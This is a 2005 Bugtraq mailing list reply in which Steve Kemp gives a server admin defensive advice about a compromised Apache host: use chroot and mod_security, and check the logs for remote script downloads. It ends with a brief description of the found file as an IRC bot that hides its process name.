Bugtraq mailing list archives
Re: Apache hacks (./atac, d0s.txt)
From: Steve Kemp <steve () steve org uk>
Date: Fri, 29 Apr 2005 22:36:53 +0100
On Fri, Apr 29, 2005 at 02:03:58PM -0500, Andrew Y Ng wrote:
My server has been seeing some usual activities today, I don't have much time to get down to the bottom of things, but after I investigated briefly I have decided to disable PERL executable permission for www-data (Apache process's user), also locked /var/tmp so www-data cannot write to it.
Use chrot to protect your server slightly more against problems with any buggy scripts. This is almost certainly the result of an insecue PHP, Perl, or other CGI script - rather than an Apache hack. If you examine your webservers logs you might see where the attack happened, perhaps you'll have entries invoking the 'wget' command to download the script you found from a remote server - that's often a common attack. If you're interested in protecting your server against input designed to attack insecure applications you might wish to investigate 'mod_security'. mod-security homepage: http://www.modsecurity.org/ mod-security under Debian example: http://www.debian-administration.org/?article=65
Looks like it ignores all the `kill` signals, not sure how I can actually kill it...
As root.
here's d0s.txt:
Connects to an irc server, forking to make its name less obvious on the process list. Steve -- # Debian System Administration www.debian-administration.org/
Current thread:
- Re: Apache hacks (./atac, d0s.txt) a.list.address () gmail com (May 02)
- Re: Apache hacks (./atac, d0s.txt) Nick Bright (May 02)
- <Possible follow-ups>
- Re: Apache hacks (./atac, d0s.txt) Chris Umphress (May 02)
- Re: Apache hacks (./atac, d0s.txt) Sagiko (May 02)
- Re: Apache hacks (./atac, d0s.txt) Daniel Cid (May 02)
- Re: Apache hacks (./atac, d0s.txt) Luiz Henrique (May 02)
- Re: Apache hacks (./atac, d0s.txt) Skip Carter (May 02)
- Re: Apache hacks (./atac, d0s.txt) Robert Zilbauer (May 02)
- Re: Apache hacks (./atac, d0s.txt) KF (lists) (May 02)
- Re: Apache hacks (./atac, d0s.txt) Jay D. Dyson (May 02)
- Re: Apache hacks (./atac, d0s.txt) Steve Kemp (May 02)